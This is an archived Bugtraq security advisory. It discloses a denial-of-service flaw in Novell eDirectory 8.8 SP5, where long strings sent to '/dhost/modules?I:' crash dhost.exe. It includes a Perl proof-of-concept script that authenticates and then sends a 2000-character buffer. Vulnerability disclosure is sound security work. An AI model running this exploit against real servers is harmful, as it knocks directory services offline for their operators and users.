NEOHAPSIS - Peace of Mind Through Integrity and Insight

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com

Neohapsis > Archives > Bugtraq> 2009-11

Novell eDirectory 8.8 SP5 Denial of Service

advisoryhackattack.com
Date: Thu Nov 12 2009 - 02:59:10 CST

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Product:
Novell eDirectory 8.8 sp5 for Windows

********************************************************************************
Vulnerability:
Denial of Service

********************************************************************************
Discussion:
Vulnerability in '/dhost/modules?I:'
Sending long strings to '/dhost/modules?I:' causes a DoS (crashing dhost.exe)
Also in last weeks published another bug in 'modules?L:'
It is not patched yet too..

********************************************************************************
Credits:
HACKATTACK IT SECURITY GmbH
Penetration Testing in Deutschland - Österreich - Schweiz
www.hackattack.com

********************************************************************************

Original Advisory
www.hackattack.com

********************************************************************************
PoC:

#!usr\bin\perl
#Vulnerability has found by HACKATTACK

use WWW::Mechanize;

use LWP::Debug qw(+);

use HTTP::Cookies;

$address=$ARGV[0];

if(!$ARGV[0]){

print "Usage:perl $0 address\n";

exit();
}

$login = "$address/_LOGIN_SERVER_";

$url = "$address/dhost/";

$module = "modules?I:";

$buffer = "A" x 2000;

$vuln = $module.$buffer;

#Edit the username and password.

$user = "username";

$pass = "password";

#Edit the username and password.

my $mechanize = WWW::Mechanize->new();

$mechanize->cookie_jar(HTTP::Cookies->new(file => "$cookie_file",autosave => 1));

$mechanize->timeout($url_timeout);

$res = $mechanize->request(HTTP::Request->new('GET', "$login"));

$mechanize->submit_form(

form_name => "authenticator",

                  fields => {

                     usr => $user,

pwd => $pass},

button => 'Login');

$response2 = $mechanize->get("$url$vuln");

About HACKATTACK
================
HACKATTACK IT SECURITY GmbH is a Penetrationtest and Security Auditing company located in Germany and Austria

More Information about HACKATTACK at
http://www.hackattack.com

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]